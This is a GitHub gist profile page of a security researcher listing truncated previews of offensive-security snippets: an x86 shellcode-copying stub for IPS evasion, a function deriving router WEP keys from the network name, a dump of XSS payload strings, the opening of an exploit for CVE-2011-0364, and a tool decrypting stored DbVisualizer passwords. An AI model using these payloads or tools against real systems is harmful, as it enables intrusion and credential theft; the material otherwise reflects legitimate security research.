Skip to content

Instantly share code, notes, and snippets.


Gerry Eisenhaur gerry

View GitHub Profile
gerry /
Created Apr 18, 2010
collection of various IPS evasions
offset = 0x1000 - len(scode) - 32
tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5
tls_header += "\x5E" # POP ESI
tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b
tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode)
tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30]
tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset
tls_header += "\x57" # PUSH EDI
tls_header += "\xFC" # CLD
tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI]
# Calculate the lower 6 bytes of the WEP key, the upper 4 are from the MAC
# address of the router (1801 or 1F90)
def get_key(essid):
key = sum(int(val, 36) * (36**idx) for idx, val in enumerate(essid))
return hex(key)
# >>> print get_key("E3X12")
# 0x349fca
gerry /
Last active Apr 8, 2020
Extracts the embedded source code from Cisco Security Agent Management Console.
#!/usr/bin/env python
""", Extracts the embedded source code from Cisco Security Agent Management Console.
Gerry <>
import os
import sys
import struct
import pefile
from itertools import takewhile
gerry / XSS Dump
Created Jan 5, 2011
Collection of random web bugs (mainly XSS)
View XSS Dump'oops')%3C/script%3E})}alert('pwned');{({/*&offset=0&max=30&numpages=4;top:0px;left:0px;height:100%;width:100%%22/onmouseover=%22alert%28/XSS/%29;alert%281%29;//,window.x%3d1));%22');alert('gerry';alert(1);//&v=malware';alert(1)//
gerry /
Last active Aug 23, 2016
Exploit for CVE-2011-0364
#!/usr/bin/env python
# Thu 24 Jun 2010 04:20:52 AM EDT
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = ""
gerry / msf-rex.gemspec
Created Nov 8, 2011 — forked from emonti/msf-rex.gemspec
gemspec to get a ruby gem out of lib/rex in the metasploit framework
View msf-rex.gemspec
# Drop this into msf3 root-dir as 'msf-rex.gemspec'.
# Create gem with:
# $ gem build msf-rex.gemspec
# Note there's already a "rex" rubygem, which is why we used 'msf-rex'.
# We can still "require 'rex'" though.
$: << 'lib'
gerry / import_nessus_nbe.diff
Created Feb 27, 2013
Quick fix for importing Nessus NBE files
View import_nessus_nbe.diff
diff --git a/lib/msf/core/db.rb b/lib/msf/core/db.rb
index 7e0bc73..9b5c8d8 100644
--- a/lib/msf/core/db.rb
+++ b/lib/msf/core/db.rb
@@ -5163,11 +5163,11 @@ class DBManager
# There is no place the NBE actually stores the plugin name used to
# scan. You get "Security Note" or "Security Warning," and that's it.
def import_nessus_nbe(args={}, &block)
- data = args[:data]
+ nbe_data = args[:data]
gerry /
Last active Jun 24, 2020
A quick hack to extract and decrypt credentials from DbVisualizer config files.
#!/usr/bin/env python
# ~
# DbVisualizer uses PBEWithMD5AndDES with a static key to store passwords.
# This is a quick hack to extract and decrypt credentials from DbVisualizer config files.
# Tested against DbVisualizer Free 9.0.9 and 9.1.6
[2014-03-25 02:05:30][not-the-sea workspace]$ security/p/gerry/misc/
[+] DbVisualizer Password Extractor and Decryptor (@gerryeisenhaur)
[+] Additional Usage Options:
[+] security/p/gerry/misc/ <config filename>

Keybase proof

I hereby claim:

  • I am gerry on github.
  • I am gerry ( on keybase.
  • I have a public key whose fingerprint is F120 587B A599 B6B6 1ED6 1A37 DD61 36D6 59E5 4DEF

To claim this, I am signing this object:

gerry /
Created Apr 29, 2015
Respond to and record dns lookups.
#!/usr/bin/env python
import sys
import random
import string
import datetime
import itertools
import threading
import traceback
import SocketServer
import operator as op
You can’t perform that action at this time.